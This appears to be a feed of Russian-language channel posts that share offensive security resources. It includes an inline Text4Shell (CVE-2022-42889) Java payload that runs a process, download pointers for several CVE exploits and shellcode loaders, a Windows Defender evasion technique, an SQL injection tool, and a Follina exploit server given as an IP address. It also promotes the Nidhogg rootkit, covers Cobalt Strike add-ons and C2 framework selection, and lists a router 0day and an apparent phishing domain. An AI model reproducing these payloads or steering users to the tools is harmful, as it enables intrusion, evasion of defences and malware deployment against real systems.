CVE-2022-42889
Apache - Commons Text library
CVSS: 9.8 CRITICAL
Почитать про дырку тут

POC
Java:

StringSubstitutor.createInterpolator().replace("${noscript:js:new java.lang.ProcessBuilder(\"calc\").start()}");

#apache

CobaltStrike <= 4.7.1 RCE
пора бы обновляться до 4.7.2 (как раз недавно вышла)
CVE-2022-39197 RCE POC

CVE-2022-3368
Дырка в произвольном перемещении файлов в компоненте обновления программного обеспечения Avira Security.
В общем LPE и systm32
download

#lpe #avira #windows

CVE-2022-27502
RealVNC server up to 6.9.0 DLL Hijacking Exploit

#exploit #realVNC

Наконец то нормальные релизы !
Windows95
Да да, она самая, только чуть чуть javaScript есть)

#old #windows

Shellcode Template
Легко модифицируемые шеллкод-шаблоны под Windows x64/x86
Download

#windows #shellcode

CVE-2022-42889
Почитать про дырку тут
Сканер дырки на питоне text4shell-tools
Сканер дырки для BurpSuite burp-text4shell
Поиграться с дыркой в докере text4shell-docker
Сам POC

#apache #exploit #poc

FUD-UUID-Shellcode
Еще одна техника внедрения шелл-кода с использованием C++, которая пытается обойти Windows defender, используя колдовство шифрования XOR и безумие строк UUID :)

Нервы и мат не помогут, но облегчат страдания.
DownLoad

#shellcode #windows #xor #uuid

SQLBOX Ultimate Injection Tool v1.1.0

#sql

Folina
httpXXX://18.181.220.197:9001/

Только для исследователей 😊
#folina #exploit #docx

Тренды в мире webshell_ов (2022)
Ну кстати хороший доклад, рекомендую глянуть

#webshell

Кто поможет vx-underground ? Чутка места не хватает у ребят

1,245,000,000 malware samples

#underground #malware

Поговорим о C&C (С2)
Многие часто спрашивают, какой C2 выбрать, может CobaltStrike или Metasploit, а может даже Sliver ?
*
Для начала читаем статью - Что такое Command and Control?
*
И смотрим сравнительную таблицу C&C (С2) , таблица хоть и далеко не полная, но из нее хорошо видно:
1. на каком ЯП C2 написан
2. какие каналы связи используют агенты
3. что предлагает саппорт
4. ссылки на ГИТы и твиттеры разрабов
5. API and MultiUsering
и тд.
*
Начитавшись - переходим к практике, ставим VM\docker\vagrant или прости господи на 127.0.0.1 и начинаем тестить.
Удачного вкатывания ! 😜

#c&c #c2

Подборка ресурсов о PenTesting и Bug Bounty Hunting
4 утра блин, спать !
#learn #pentest

JuicyPotatoNG
Windows LPE: от сервисной учётки до system
Read
Download LPE

#lpe #windows

Pentest BOOK
Есть интересные примеры
Read

#learn

Пора вводить рубрику "В мире Кобальта"
*

ScreenshotBOF

Альтернативная возможность делать снимки экрана для Cobalt Strike, которая использует WinAPI и не выполняет fork & run.
Пойти, скачать, установить - туть

#cobalt

Знакомьтесь - Nidhogg
Это такой rootkit под windows. Вчера кстати обновился !
—- Из фишек —-

* Process hiding
* Process elevation
* Anti process kill
* Anti process dumping
* Bypass pe-sieve
* Anti file deletion
* Anti file overwriting
* Registry keys and values anti deletion
* Registry keys and values hiding
* Registry keys and values anti overwriting
* Querying currently protected processes, files and registry keys & values
* Arbitrary R/W
* Function patching
* Built-in AMSI bypass
* Built-in ETW patch
download

#windows #rootkit

awesome-security-hardening
*
Когда то мы уже публиковали что то подобное, но контент постоянно обновляется.
Всегда найдется не прочитанная раздел\глава\абзац.
Привет blueTeamы и DevSecOpsы)))
Download

#security #blueteam #devsecops

бывает с похмелья)))
XXXX://dropboxeb.weebly.com/

aukey wr-r01 ROUTER
0day

#exploit #0day